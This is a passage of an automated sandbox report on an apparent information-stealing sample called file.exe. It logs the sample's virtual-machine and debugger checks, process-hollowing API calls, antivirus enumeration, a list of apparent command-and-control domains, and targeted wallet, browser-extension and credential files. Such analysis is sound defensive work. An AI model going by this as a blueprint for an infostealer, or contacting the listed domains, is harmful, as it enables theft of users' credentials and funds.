              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0044AEB8 push ecx; ret 3_2_0044AEB9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BC124A push ecx; ret 3_2_00BC125D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA6390 push eax; ret 3_2_00BA66C2
              Source: file.exeStatic PE information: section name: .text entropy: 7.0240622903518135
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC15DC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BC15DC
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 10.0 %
              Source: C:\Users\user\Desktop\file.exe TID: 1776Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5652Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD55BC FindFirstFileExW,0_2_00BD55BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD566D FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00BD566D
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BD55BC FindFirstFileExW,3_2_00BD55BC
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BD566D FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00BD566D
              Source: Amcache.hve.6.drBinary or memory string: VMware
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000003.00000003.2118357083.00000000038B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: file.exe, 00000003.00000002.2192697514.0000000001316000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Amcache.hve.6.drBinary or memory string: vmci.sys
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000003.00000003.2118357083.00000000038B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: file.exe, 00000003.00000002.2192697514.00000000012EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: file.exe, 00000003.00000003.2118424044.00000000038A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00440D90 LdrInitializeThunk,3_2_00440D90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCA37A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BCA37A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEE1B4 mov edi, dword ptr fs:[00000030h]0_2_00BEE1B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA6390 mov edi, dword ptr fs:[00000030h]0_2_00BA6390
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BA6390 mov edi, dword ptr fs:[00000030h]3_2_00BA6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD1074 GetProcessHeap,0_2_00BD1074
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCA37A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BCA37A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC0CBB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BC0CBB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC0D3E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC0D3E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC0D32 SetUnhandledExceptionFilter,0_2_00BC0D32
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BCA37A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00BCA37A
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BC0CBB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00BC0CBB
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BC0D3E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00BC0D3E
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00BC0D32 SetUnhandledExceptionFilter,3_2_00BC0D32

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEE1B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00BEE1B4
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: servicedny.site
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: authorisev.site
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: faulteyotk.site
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: dilemmadu.site
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: contemteny.site
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: goalyfeastz.site
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: opposezmny.site
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seallysl.site
              Source: file.exe, 00000000.00000002.2279638953.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: forbidstow.site
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC0EAF cpuid 0_2_00BC0EAF
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00BD508B
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00BD5191
              Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00BD4926
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00BD095F
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00BD4B77
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00BD4C12
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00BD0464
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00BD4EC4
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00BD4E65
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00BD4F99
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00BD4FE4
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00BD508B
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,3_2_00BD5191
              Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00BD4926
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,3_2_00BD095F
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,3_2_00BD4B77
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00BD4C12
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,3_2_00BD0464
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,3_2_00BD4EC4
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,3_2_00BD4E65
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,3_2_00BD4F99
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,3_2_00BD4FE4
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC1C97 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BC1C97
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: file.exe, 00000003.00000002.2192697514.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.2193225494.0000000003860000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2192697514.0000000001316000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000003.00000003.2118733198.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: file.exe, 00000003.00000003.2118733198.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exe, 00000003.00000003.2118075950.000000000138D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: file.exe, 00000003.00000003.2118733198.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000003.00000003.2165330724.0000000001391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000003.00000002.2192697514.0000000001316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: file.exe, 00000003.00000003.2118733198.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000003.00000003.2165330724.0000000001391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
